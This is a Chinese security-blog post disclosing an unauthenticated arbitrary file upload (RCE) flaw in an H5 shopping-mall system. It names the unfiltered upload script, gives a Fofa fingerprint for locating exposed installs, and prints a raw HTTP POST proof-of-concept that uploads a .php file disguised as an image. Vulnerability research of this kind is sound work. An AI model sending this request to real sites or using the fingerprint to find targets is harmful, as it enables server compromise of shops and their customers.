某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)
某全新H5购物商城系统存在前台任意文件上传漏洞(RCE)
原创 Mstir 星悦安全 2024-11-18 03:39
点击上方
蓝字关注我们 并设为
星标
0x00 前言
该源码采用HTML5技术开发,可以完美适配各种移动设备,以及iOS和Android系统。同时,易支付接口更为商家提供了便捷的交易功能,让顾客可以轻松通过手机进行网络支付,享受到更加便捷的购物体验。
该源码界面设计十分简洁、清爽,同时还保证了购物流程的顺畅和简便。无论是主页、分类页面、商品详情页面,都给人留下了很好的第一印象。
Fofa指纹:”/src/images/gg.png” && “/public/goods.php”
0x01 漏洞分析&复现
位于 /admin/commodtiy/file.php 文件中存在move_uploaded_file 函数上传文件,且未有任何过滤,导致漏洞产生.“`
**Payload:**
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=——WebKitFormBoundary03rNBzFMIytvpWhy
Cookie: Hm_lvt_d3b3b1b968a56124689d1366adeacf8f=1731328644; PHPSESSID=nbkea3f11cmfad1qhfcm29aqn7; thinkphp_show_page_trace=0|0; bh_myaction=Index%2Findex; _ga=GA1.1.2095806093.1731475984; _gid=GA1.1.546134623.1731475984; yzm=G2DD
Host: 127.0.0.1
Origin: http://127.0.0.1
Referer: http://127.0.0.1/admin/commodtiy/file.php?upload
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
sec-ch-ua: “Chromium”;v=”130″, “Google Chrome”;v=”130″, “Not?A_Brand”;v=”99″
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: “Windows”
sec-fetch-user: ?1
——WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name=”file”; filename=”1.php”
Content-Type: image/jpeg
——WebKitFormBoundary03rNBzFMIytvpWhy–
“`
0x02 源码下载
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转
购物商城源码关注公众号发送 241117 获取!
进星悦安全公开群添加下方VX 备注 “进群”
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!